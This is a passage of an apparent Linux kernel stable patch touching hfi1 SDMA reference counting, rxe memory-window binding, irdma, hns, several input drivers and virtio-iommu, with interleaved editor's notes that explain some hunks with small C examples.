++	void (*ctx_get)(void *),
++	void (*ctx_put)(void *))
+ {
+ 	dma_addr_t addr;
+ 	int rval;
+@@ -720,7 +737,8 @@ static inline int sdma_txadd_page(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, pinning_ctx, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, tx, addr, len,
++				 pinning_ctx, ctx_get, ctx_put);
+ }
+ 
+ /**
+@@ -754,8 +772,8 @@ static inline int sdma_txadd_daddr(
+ 			return rval;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, NULL, tx,
+-				 addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, tx, addr, len,
++				 NULL, NULL, NULL);
+ }
+ 
+ /**
+@@ -801,7 +819,8 @@ static inline int sdma_txadd_kvaddr(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx, addr, len,
++				 NULL, NULL, NULL);
+ }
+ 
+ struct iowait_work;
+@@ -1034,6 +1053,4 @@ u16 sdma_get_descq_cnt(void);
+ extern uint mod_num_sdma;
+ 
+ void sdma_update_lmc(struct hfi1_devdata *dd, u64 mask, u32 lid);
+-
+-void system_descriptor_complete(struct hfi1_devdata *dd, struct sdma_desc *descp);
+ #endif
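
[Editor's note] For a concrete use of the kernel-doc above, the user_sdma.c hunk later in this patch passes a pinned-page cache entry together with its get/put helpers:

	ret = sdma_txadd_page(pq->dd, &tx->txreq,
			      cache_entry->pages[page_index],
			      page_offset, from_this_page,
			      ctx,			/* pinning_ctx */
			      sdma_mmu_rb_node_get,	/* ref taken on add */
			      sdma_mmu_rb_node_put);	/* dropped at retire */
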
+diff --git a/drivers/infiniband/hw/hfi1/sdma_txreq.h b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+index fad946cb5e0d8..85ae7293c2741 100644
+--- a/drivers/infiniband/hw/hfi1/sdma_txreq.h
++++ b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+@@ -20,6 +20,8 @@ struct sdma_desc {
+ 	/* private:  don't use directly */
+ 	u64 qw[2];
+ 	void *pinning_ctx;
++	/* Release reference to @pinning_ctx. May be called in interrupt context. Must not sleep. */
++	void (*ctx_put)(void *ctx);
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.c b/drivers/infiniband/hw/hfi1/user_sdma.c
+index ae58b48afe074..02bd62b857b75 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.c
++++ b/drivers/infiniband/hw/hfi1/user_sdma.c
+@@ -62,18 +62,14 @@ static int defer_packet_queue(
+ static void activate_packet_queue(struct iowait *wait, int reason);
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len);
+-static int sdma_rb_insert(void *arg, struct mmu_rb_node *mnode);
+ static int sdma_rb_evict(void *arg, struct mmu_rb_node *mnode,
+ 			 void *arg2, bool *stop);
+ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode);
+-static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode);
+ 
+ static struct mmu_rb_ops sdma_rb_ops = {
+ 	.filter = sdma_rb_filter,
+-	.insert = sdma_rb_insert,
+ 	.evict = sdma_rb_evict,
+ 	.remove = sdma_rb_remove,
+-	.invalidate = sdma_rb_invalidate
+ };
+ 
+ static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
+@@ -247,14 +243,14 @@ int hfi1_user_sdma_free_queues(struct hfi1_filedata *fd,
+ 		spin_unlock(&fd->pq_rcu_lock);
+ 		synchronize_srcu(&fd->pq_srcu);
+ 		/* at this point there can be no more new requests */
+-		if (pq->handler)
+-			hfi1_mmu_rb_unregister(pq->handler);
+ 		iowait_sdma_drain(&pq->busy);
+ 		/* Wait until all requests have been freed. */
+ 		wait_event_interruptible(
+ 			pq->wait,
+ 			!atomic_read(&pq->n_reqs));
+ 		kfree(pq->reqs);
++		if (pq->handler)
++			hfi1_mmu_rb_unregister(pq->handler);
+ 		bitmap_free(pq->req_in_use);
+ 		kmem_cache_destroy(pq->txreq_cache);
+ 		flush_pq_iowait(pq);
+@@ -1275,25 +1271,17 @@ static void free_system_node(struct sdma_mmu_node *node)
+ 	kfree(node);
+ }
+ 
+-static inline void acquire_node(struct sdma_mmu_node *node)
+-{
+-	atomic_inc(&node->refcount);
+-	WARN_ON(atomic_read(&node->refcount) < 0);
+-}
+-
+-static inline void release_node(struct mmu_rb_handler *handler,
+-				struct sdma_mmu_node *node)
+-{
+-	atomic_dec(&node->refcount);
+-	WARN_ON(atomic_read(&node->refcount) < 0);
+-}
+-
++/*
++ * Takes an additional kref on the returned rb_node to prevent rb_node
++ * from being released until after rb_node is assigned to an SDMA descriptor
++ * (struct sdma_desc) under add_system_iovec_to_sdma_packet(), even if the
++ * virtual address range for rb_node is invalidated between now and then.
++ */
+ static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
+ 					      unsigned long start,
+ 					      unsigned long end)
+ {
+ 	struct mmu_rb_node *rb_node;
+-	struct sdma_mmu_node *node;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+@@ -1302,11 +1290,12 @@ static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
+ 		spin_unlock_irqrestore(&handler->lock, flags);
+ 		return NULL;
+ 	}
+-	node = container_of(rb_node, struct sdma_mmu_node, rb);
+-	acquire_node(node);
++
++	/* "safety" kref to prevent release before add_system_iovec_to_sdma_packet() */
++	kref_get(&rb_node->refcount);
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	return node;
++	return container_of(rb_node, struct sdma_mmu_node, rb);
+ }
+ 
+ static int pin_system_pages(struct user_sdma_request *req,
+@@ -1355,6 +1344,13 @@ retry:
+ 	return 0;
+ }
+ 
++/*
++ * kref refcount on *node_p will be 2 on successful addition: one kref from
++ * kref_init() for mmu_rb_handler and one kref to prevent *node_p from being
++ * released until after *node_p is assigned to an SDMA descriptor (struct
++ * sdma_desc) under add_system_iovec_to_sdma_packet(), even if the virtual
++ * address range for *node_p is invalidated between now and then.
++ */
+ static int add_system_pinning(struct user_sdma_request *req,
+ 			      struct sdma_mmu_node **node_p,
+ 			      unsigned long start, unsigned long len)
+@@ -1368,6 +1364,12 @@ static int add_system_pinning(struct user_sdma_request *req,
+ 	if (!node)
+ 		return -ENOMEM;
+ 
++	/* First kref "moves" to mmu_rb_handler */
++	kref_init(&node->rb.refcount);
++
++	/* "safety" kref to prevent release before add_system_iovec_to_sdma_packet() */
++	kref_get(&node->rb.refcount);
++
+ 	node->pq = pq;
+ 	ret = pin_system_pages(req, start, len, node, PFN_DOWN(len));
+ 	if (ret == 0) {
+@@ -1431,15 +1433,15 @@ static int get_system_cache_entry(struct user_sdma_request *req,
+ 			return 0;
+ 		}
+ 
+-		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->refcount %d",
+-			 node->rb.addr, atomic_read(&node->refcount));
++		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->rb.refcount %d",
++			 node->rb.addr, kref_read(&node->rb.refcount));
+ 		prepend_len = node->rb.addr - start;
+ 
+ 		/*
+ 		 * This node will not be returned, instead a new node
+ 		 * will be. So release the reference.
+ 		 */
+-		release_node(handler, node);
++		kref_put(&node->rb.refcount, hfi1_mmu_rb_release);
+ 
+ 		/* Prepend a node to cover the beginning of the allocation */
+ 		ret = add_system_pinning(req, node_p, start, prepend_len);
+@@ -1451,6 +1453,20 @@ static int get_system_cache_entry(struct user_sdma_request *req,
+ 	}
+ }
+ 
++static void sdma_mmu_rb_node_get(void *ctx)
++{
++	struct mmu_rb_node *node = ctx;
++
++	kref_get(&node->refcount);
++}
++
++static void sdma_mmu_rb_node_put(void *ctx)
++{
++	struct sdma_mmu_node *node = ctx;
++
++	kref_put(&node->rb.refcount, hfi1_mmu_rb_release);
++}
++
+ static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
+ 				      struct user_sdma_txreq *tx,
+ 				      struct sdma_mmu_node *cache_entry,
+@@ -1494,9 +1510,12 @@ static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
+ 			ctx = cache_entry;
+ 		}
+ 
+-		ret = sdma_txadd_page(pq->dd, ctx, &tx->txreq,
++		ret = sdma_txadd_page(pq->dd, &tx->txreq,
+ 				      cache_entry->pages[page_index],
+-				      page_offset, from_this_page);
++				      page_offset, from_this_page,
++				      ctx,
++				      sdma_mmu_rb_node_get,
++				      sdma_mmu_rb_node_put);
+ 		if (ret) {
+ 			/*
+ 			 * When there's a failure, the entire request is freed by
+@@ -1518,8 +1537,6 @@ static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
+ 					   struct user_sdma_iovec *iovec,
+ 					   size_t from_this_iovec)
+ {
+-	struct mmu_rb_handler *handler = req->pq->handler;
+-
+ 	while (from_this_iovec > 0) {
+ 		struct sdma_mmu_node *cache_entry;
+ 		size_t from_this_cache_entry;
+@@ -1540,15 +1557,15 @@ static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
+ 
+ 		ret = add_mapping_to_sdma_packet(req, tx, cache_entry, start,
+ 						 from_this_cache_entry);
++
++		/*
++		 * Done adding cache_entry to zero or more sdma_desc. Can
++		 * kref_put() the "safety" kref taken under
++		 * get_system_cache_entry().
++		 */
++		kref_put(&cache_entry->rb.refcount, hfi1_mmu_rb_release);
++
+ 		if (ret) {
+-			/*
+-			 * We're guaranteed that there will be no descriptor
+-			 * completion callback that releases this node
+-			 * because only the last descriptor referencing it
+-			 * has a context attached, and a failure means the
+-			 * last descriptor was never added.
+-			 */
+-			release_node(handler, cache_entry);
+ 			SDMA_DBG(req, "add system segment failed %d", ret);
+ 			return ret;
+ 		}
+@@ -1599,42 +1616,12 @@ static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
+ 	return 0;
+ }
+ 
+-void system_descriptor_complete(struct hfi1_devdata *dd,
+-				struct sdma_desc *descp)
+-{
+-	switch (sdma_mapping_type(descp)) {
+-	case SDMA_MAP_SINGLE:
+-		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
+-				 sdma_mapping_len(descp), DMA_TO_DEVICE);
+-		break;
+-	case SDMA_MAP_PAGE:
+-		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
+-			       sdma_mapping_len(descp), DMA_TO_DEVICE);
+-		break;
+-	}
+-
+-	if (descp->pinning_ctx) {
+-		struct sdma_mmu_node *node = descp->pinning_ctx;
+-
+-		release_node(node->rb.handler, node);
+-	}
+-}
+-
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len)
+ {
+ 	return (bool)(node->addr == addr);
+ }
+ 
+-static int sdma_rb_insert(void *arg, struct mmu_rb_node *mnode)
+-{
+-	struct sdma_mmu_node *node =
+-		container_of(mnode, struct sdma_mmu_node, rb);
+-
+-	atomic_inc(&node->refcount);
+-	return 0;
+-}
+-
+ /*
+  * Return 1 to remove the node from the rb tree and call the remove op.
+  *
+@@ -1647,10 +1634,6 @@ static int sdma_rb_evict(void *arg, struct mmu_rb_node *mnode,
+ 		container_of(mnode, struct sdma_mmu_node, rb);
+ 	struct evict_data *evict_data = evict_arg;
+ 
+-	/* is this node still being used? */
+-	if (atomic_read(&node->refcount))
+-		return 0; /* keep this node */
+-
+ 	/* this node will be evicted, add its pages to our count */
+ 	evict_data->cleared += node->npages;
+ 
+@@ -1668,13 +1651,3 @@ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode)
+ 
+ 	free_system_node(node);
+ }
+-
+-static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode)
+-{
+-	struct sdma_mmu_node *node =
+-		container_of(mnode, struct sdma_mmu_node, rb);
+-
+-	if (!atomic_read(&node->refcount))
+-		return 1;
+-	return 0;
+-}
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.h b/drivers/infiniband/hw/hfi1/user_sdma.h
+index a241836371dc1..548347d4c5bc2 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.h
++++ b/drivers/infiniband/hw/hfi1/user_sdma.h
+@@ -104,7 +104,6 @@ struct hfi1_user_sdma_comp_q {
+ struct sdma_mmu_node {
+ 	struct mmu_rb_node rb;
+ 	struct hfi1_user_sdma_pkt_q *pq;
+-	atomic_t refcount;
+ 	struct page **pages;
+ 	unsigned int npages;
+ };
+diff --git a/drivers/infiniband/hw/hfi1/vnic_sdma.c b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+index 727eedfba332a..cc6324d2d1ddc 100644
+--- a/drivers/infiniband/hw/hfi1/vnic_sdma.c
++++ b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+@@ -64,11 +64,11 @@ static noinline int build_vnic_ulp_payload(struct sdma_engine *sde,
+ 
+ 		/* combine physically continuous fragments later? */
+ 		ret = sdma_txadd_page(sde->dd,
+-				      NULL,
+ 				      &tx->txreq,
+ 				      skb_frag_page(frag),
+ 				      skb_frag_off(frag),
+-				      skb_frag_size(frag));
++				      skb_frag_size(frag),
++				      NULL, NULL, NULL);
+ 		if (unlikely(ret))
+ 			goto bail_txadd;
+ 	}
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hem.c b/drivers/infiniband/hw/hns/hns_roce_hem.c
+index aa8a08d1c0145..f30274986c0da 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hem.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hem.c
+@@ -595,11 +595,12 @@ int hns_roce_table_get(struct hns_roce_dev *hr_dev,
+ 	}
+ 
+ 	/* Set HEM base address(128K/page, pa) to Hardware */
+-	if (hr_dev->hw->set_hem(hr_dev, table, obj, HEM_HOP_STEP_DIRECT)) {
++	ret = hr_dev->hw->set_hem(hr_dev, table, obj, HEM_HOP_STEP_DIRECT);
++	if (ret) {
+ 		hns_roce_free_hem(hr_dev, table->hem[i]);
+ 		table->hem[i] = NULL;
+-		ret = -ENODEV;
+-		dev_err(dev, "set HEM base address to HW failed.\n");
++		dev_err(dev, "set HEM base address to HW failed, ret = %d.\n",
++			ret);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index 16183e894da77..dd428d915c175 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
+@@ -93,16 +93,18 @@ static int irdma_nop_1(struct irdma_qp_uk *qp)
+  */
+ void irdma_clr_wqes(struct irdma_qp_uk *qp, u32 qp_wqe_idx)
+ {
+-	__le64 *wqe;
++	struct irdma_qp_quanta *sq;
+ 	u32 wqe_idx;
+ 
+ 	if (!(qp_wqe_idx & 0x7F)) {
+ 		wqe_idx = (qp_wqe_idx + 128) % qp->sq_ring.size;
+-		wqe = qp->sq_base[wqe_idx].elem;
++		sq = qp->sq_base + wqe_idx;
+ 		if (wqe_idx)
+-			memset(wqe, qp->swqe_polarity ? 0 : 0xFF, 0x1000);
++			memset(sq, qp->swqe_polarity ? 0 : 0xFF,
++			       128 * sizeof(*sq));
+ 		else
+-			memset(wqe, qp->swqe_polarity ? 0xFF : 0, 0x1000);
++			memset(sq, qp->swqe_polarity ? 0xFF : 0,
++			       128 * sizeof(*sq));
+ 	}
+ }
+ 
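
[Editor's note] The irdma hunk above derives the cleared size from the element type, 128 * sizeof(*sq), instead of the magic 0x1000; the two presumably agree today (they match if a quantum is 32 bytes), but tying the size to the type keeps the memset correct if the quantum layout ever changes. The idiom in standalone form (the 4-element layout here is an assumption for illustration):

	#include <stdio.h>
	#include <string.h>

	struct quanta {
		unsigned long long elem[4];	/* 32 bytes with elem[4] */
	};

	int main(void)
	{
		struct quanta sq[128];

		/* size follows the type, not a hand-computed constant */
		memset(sq, 0xFF, 128 * sizeof(*sq));
		printf("cleared %zu bytes\n", 128 * sizeof(*sq));
		return 0;
	}
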
+diff --git a/drivers/infiniband/sw/rxe/rxe.h b/drivers/infiniband/sw/rxe/rxe.h
+index 30fbdf3bc76a3..ab334900fcc3d 100644
+--- a/drivers/infiniband/sw/rxe/rxe.h
++++ b/drivers/infiniband/sw/rxe/rxe.h
+@@ -38,6 +38,25 @@
+ 
+ #define RXE_ROCE_V2_SPORT		(0xc000)
+ 
++#define rxe_dbg(rxe, fmt, ...) ibdev_dbg(&(rxe)->ib_dev,		\
++		"%s: " fmt, __func__, ##__VA_ARGS__)
++#define rxe_dbg_uc(uc, fmt, ...) ibdev_dbg((uc)->ibuc.device,		\
++		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_pd(pd, fmt, ...) ibdev_dbg((pd)->ibpd.device,		\
++		"pd#%d %s: " fmt, (pd)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_ah(ah, fmt, ...) ibdev_dbg((ah)->ibah.device,		\
++		"ah#%d %s: " fmt, (ah)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_srq(srq, fmt, ...) ibdev_dbg((srq)->ibsrq.device,	\
++		"srq#%d %s: " fmt, (srq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_qp(qp, fmt, ...) ibdev_dbg((qp)->ibqp.device,		\
++		"qp#%d %s: " fmt, (qp)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_cq(cq, fmt, ...) ibdev_dbg((cq)->ibcq.device,		\
++		"cq#%d %s: " fmt, (cq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_mr(mr, fmt, ...) ibdev_dbg((mr)->ibmr.device,		\
++		"mr#%d %s:  " fmt, (mr)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_dbg_mw(mw, fmt, ...) ibdev_dbg((mw)->ibmw.device,		\
++		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
++
+ void rxe_set_mtu(struct rxe_dev *rxe, unsigned int dev_mtu);
+ 
+ int rxe_add(struct rxe_dev *rxe, unsigned int mtu, const char *ibdev_name);
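
[Editor's note] As a usage note for the macro block above: each wrapper stamps the message with the object kind, the object's pool index, and the calling function, which is what lets the rxe_mw.c hunk below drop its pr_err_once() calls. For instance:

	rxe_dbg_mw(mw, "attempt to bind a zero based type 1 MW\n");

	/* expands, per the definition above, to */
	ibdev_dbg((mw)->ibmw.device,
		  "mw#%d %s:  attempt to bind a zero based type 1 MW\n",
		  (mw)->elem.index, __func__);
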
+diff --git a/drivers/infiniband/sw/rxe/rxe_mw.c b/drivers/infiniband/sw/rxe/rxe_mw.c
+index 902b7df7aaedb..cebc9f0f428d8 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mw.c
++++ b/drivers/infiniband/sw/rxe/rxe_mw.c
+@@ -48,18 +48,18 @@ int rxe_dealloc_mw(struct ib_mw *ibmw)
+ }
+ 
+ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+-			 struct rxe_mw *mw, struct rxe_mr *mr)
++			 struct rxe_mw *mw, struct rxe_mr *mr, int access)
+ {
+ 	if (mw->ibmw.type == IB_MW_TYPE_1) {
+ 		if (unlikely(mw->state != RXE_MW_STATE_VALID)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a type 1 MW not in the valid state\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* o10-36.2.2 */
+-		if (unlikely((mw->access & IB_ZERO_BASED))) {
+-			pr_err_once("attempt to bind a zero based type 1 MW\n");
++		if (unlikely((access & IB_ZERO_BASED))) {
++			rxe_dbg_mw(mw, "attempt to bind a zero based type 1 MW\n");
+ 			return -EINVAL;
+ 		}
+ 	}
+@@ -67,21 +67,21 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ 	if (mw->ibmw.type == IB_MW_TYPE_2) {
+ 		/* o10-37.2.30 */
+ 		if (unlikely(mw->state != RXE_MW_STATE_FREE)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a type 2 MW not in the free state\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* C10-72 */
+ 		if (unlikely(qp->pd != to_rpd(mw->ibmw.pd))) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind type 2 MW with qp with different PD\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* o10-37.2.40 */
+ 		if (unlikely(!mr || wqe->wr.wr.mw.length == 0)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to invalidate type 2 MW by binding with NULL or zero length MR\n");
+ 			return -EINVAL;
+ 		}
+@@ -92,30 +92,30 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ 		return 0;
+ 
+ 	if (unlikely(mr->access & IB_ZERO_BASED)) {
+-		pr_err_once("attempt to bind MW to zero based MR\n");
++		rxe_dbg_mw(mw, "attempt to bind MW to zero based MR\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* C10-73 */
+ 	if (unlikely(!(mr->access & IB_ACCESS_MW_BIND))) {
+-		pr_err_once(
++		rxe_dbg_mw(mw,
+ 			"attempt to bind an MW to an MR without bind access\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* C10-74 */
+-	if (unlikely((mw->access &
++	if (unlikely((access &
+ 		      (IB_ACCESS_REMOTE_WRITE | IB_ACCESS_REMOTE_ATOMIC)) &&
+ 		     !(mr->access & IB_ACCESS_LOCAL_WRITE))) {
+-		pr_err_once(
++		rxe_dbg_mw(mw,
+ 			"attempt to bind a writable MW to an MR without local write access\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* C10-75 */
+-	if (mw->access & IB_ZERO_BASED) {
++	if (access & IB_ZERO_BASED) {
+ 		if (unlikely(wqe->wr.wr.mw.length > mr->ibmr.length)) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a ZB MW outside of the MR\n");
+ 			return -EINVAL;
+ 		}
+@@ -123,7 +123,7 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ 		if (unlikely((wqe->wr.wr.mw.addr < mr->ibmr.iova) ||
+ 			     ((wqe->wr.wr.mw.addr + wqe->wr.wr.mw.length) >
+ 			      (mr->ibmr.iova + mr->ibmr.length)))) {
+-			pr_err_once(
++			rxe_dbg_mw(mw,
+ 				"attempt to bind a VA MW outside of the MR\n");
+ 			return -EINVAL;
+ 		}
+@@ -133,12 +133,12 @@ static int rxe_check_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+ }
+ 
+ static void rxe_do_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe,
+-		      struct rxe_mw *mw, struct rxe_mr *mr)
++		      struct rxe_mw *mw, struct rxe_mr *mr, int access)
+ {
+ 	u32 key = wqe->wr.wr.mw.rkey & 0xff;
+ 
+ 	mw->rkey = (mw->rkey & ~0xff) | key;
+-	mw->access = wqe->wr.wr.mw.access;
++	mw->access = access;
+ 	mw->state = RXE_MW_STATE_VALID;
+ 	mw->addr = wqe->wr.wr.mw.addr;
+ 	mw->length = wqe->wr.wr.mw.length;
+@@ -169,6 +169,7 @@ int rxe_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	u32 mw_rkey = wqe->wr.wr.mw.mw_rkey;
+ 	u32 mr_lkey = wqe->wr.wr.mw.mr_lkey;
++	int access = wqe->wr.wr.mw.access;
+ 
+ 	mw = rxe_pool_get_index(&rxe->mw_pool, mw_rkey >> 8);
+ 	if (unlikely(!mw)) {
+@@ -198,11 +199,11 @@ int rxe_bind_mw(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 
+ 	spin_lock_bh(&mw->lock);
+ 
+-	ret = rxe_check_bind_mw(qp, wqe, mw, mr);
++	ret = rxe_check_bind_mw(qp, wqe, mw, mr, access);
+ 	if (ret)
+ 		goto err_unlock;
+ 
+-	rxe_do_bind_mw(qp, wqe, mw, mr);
++	rxe_do_bind_mw(qp, wqe, mw, mr, access);
+ err_unlock:
+ 	spin_unlock_bh(&mw->lock);
+ err_drop_mr:
+diff --git a/drivers/input/misc/adxl34x.c b/drivers/input/misc/adxl34x.c
+index a4af314392a9f..69e359ff51805 100644
+--- a/drivers/input/misc/adxl34x.c
++++ b/drivers/input/misc/adxl34x.c
+@@ -811,8 +811,7 @@ struct adxl34x *adxl34x_probe(struct device *dev, int irq,
+ 	AC_WRITE(ac, POWER_CTL, 0);
+ 
+ 	err = request_threaded_irq(ac->irq, NULL, adxl34x_irq,
+-				   IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
+-				   dev_name(dev), ac);
++				   IRQF_ONESHOT, dev_name(dev), ac);
+ 	if (err) {
+ 		dev_err(dev, "irq %d busy?\n", ac->irq);
+ 		goto err_free_mem;
+diff --git a/drivers/input/misc/drv260x.c b/drivers/input/misc/drv260x.c
+index 0efe56f49aa94..1923924fdd444 100644
+--- a/drivers/input/misc/drv260x.c
++++ b/drivers/input/misc/drv260x.c
+@@ -435,6 +435,7 @@ static int drv260x_init(struct drv260x_data *haptics)
+ 	}
+ 
+ 	do {
++		usleep_range(15000, 15500);
+ 		error = regmap_read(haptics->regmap, DRV260X_GO, &cal_buf);
+ 		if (error) {
+ 			dev_err(&haptics->client->dev,
+diff --git a/drivers/input/misc/pm8941-pwrkey.c b/drivers/input/misc/pm8941-pwrkey.c
+index 549df01b6ee33..5dd68a02c4451 100644
+--- a/drivers/input/misc/pm8941-pwrkey.c
++++ b/drivers/input/misc/pm8941-pwrkey.c
+@@ -50,7 +50,10 @@
+ #define  PON_RESIN_PULL_UP		BIT(0)
+ 
+ #define PON_DBC_CTL			0x71
+-#define  PON_DBC_DELAY_MASK		0x7
++#define  PON_DBC_DELAY_MASK_GEN1	0x7
++#define  PON_DBC_DELAY_MASK_GEN2	0xf
++#define  PON_DBC_SHIFT_GEN1		6
++#define  PON_DBC_SHIFT_GEN2		14
+ 
+ struct pm8941_data {
+ 	unsigned int	pull_up_bit;
+@@ -247,7 +250,7 @@ static int pm8941_pwrkey_probe(struct platform_device *pdev)
+ 	struct device *parent;
+ 	struct device_node *regmap_node;
+ 	const __be32 *addr;
+-	u32 req_delay;
++	u32 req_delay, mask, delay_shift;
+ 	int error;
+ 
+ 	if (of_property_read_u32(pdev->dev.of_node, "debounce", &req_delay))
+@@ -336,12 +339,20 @@ static int pm8941_pwrkey_probe(struct platform_device *pdev)
+ 	pwrkey->input->phys = pwrkey->data->phys;
+ 
+ 	if (pwrkey->data->supports_debounce_config) {
+-		req_delay = (req_delay << 6) / USEC_PER_SEC;
++		if (pwrkey->subtype >= PON_SUBTYPE_GEN2_PRIMARY) {
++			mask = PON_DBC_DELAY_MASK_GEN2;
++			delay_shift = PON_DBC_SHIFT_GEN2;
++		} else {
++			mask = PON_DBC_DELAY_MASK_GEN1;
++			delay_shift = PON_DBC_SHIFT_GEN1;
++		}
++
++		req_delay = (req_delay << delay_shift) / USEC_PER_SEC;
+ 		req_delay = ilog2(req_delay);
+ 
+ 		error = regmap_update_bits(pwrkey->regmap,
+ 					   pwrkey->baseaddr + PON_DBC_CTL,
+-					   PON_DBC_DELAY_MASK,
++					   mask,
+ 					   req_delay);
+ 		if (error) {
+ 			dev_err(&pdev->dev, "failed to set debounce: %d\n",
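
[Editor's note] A standalone check of the encoding in the hunk above: the requested debounce in microseconds becomes a register code via ilog2((req_delay << shift) / USEC_PER_SEC), with shift and mask now chosen per PON generation. For a GEN2 part (shift 14), a 15625 us request encodes as 8, since (15625 << 14) / 1000000 = 256 and ilog2(256) = 8:

	#include <stdio.h>

	static unsigned int ilog2_u(unsigned long long v)
	{
		unsigned int r = 0;

		while (v >>= 1)
			r++;
		return r;
	}

	int main(void)
	{
		unsigned long long req_delay = 15625;	/* microseconds */
		unsigned int gen2_shift = 14;
		unsigned int code;

		code = ilog2_u((req_delay << gen2_shift) / 1000000);
		printf("GEN2 code for 15625us = %u\n", code);	/* prints 8 */
		return 0;
	}
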
+diff --git a/drivers/iommu/virtio-iommu.c b/drivers/iommu/virtio-iommu.c
+index 8b1b5c270e502..fd86ccb709ec5 100644
+--- a/drivers/iommu/virtio-iommu.c
++++ b/drivers/iommu/virtio-iommu.c
+@@ -789,6 +789,29 @@ static int viommu_attach_dev(struct iommu_domain *domain, struct device *dev)
+ 	return 0;
+ }
+ 
++static void viommu_detach_dev(struct viommu_endpoint *vdev)
++{
++	int i;
++	struct virtio_iommu_req_detach req;
++	struct viommu_domain *vdomain = vdev->vdomain;
++	struct iommu_fwspec *fwspec = dev_iommu_fwspec_get(vdev->dev);
++
++	if (!vdomain)
++		return;
++
++	req = (struct virtio_iommu_req_detach) {
++		.head.type	= VIRTIO_IOMMU_T_DETACH,
++		.domain		= cpu_to_le32(vdomain->id),
++	};
++
++	for (i = 0; i < fwspec->num_ids; i++) {
++		req.endpoint = cpu_to_le32(fwspec->ids[i]);
++		WARN_ON(viommu_send_req_sync(vdev->viommu, &req, sizeof(req)));
++	}
++	vdomain->nr_endpoints--;
++	vdev->vdomain = NULL;
++}
++
+ static int viommu_map_pages(struct iommu_domain *domain, unsigned long iova,
+ 			    phys_addr_t paddr, size_t pgsize, size_t pgcount,
+ 			    int prot, gfp_t gfp, size_t *mapped)
+@@ -811,25 +834,26 @@ static int viommu_map_pages(struct iommu_domain *domain, unsigned long iova,
+ 	if (ret)
+ 		return ret;
+ 
+-	map = (struct virtio_iommu_req_map) {
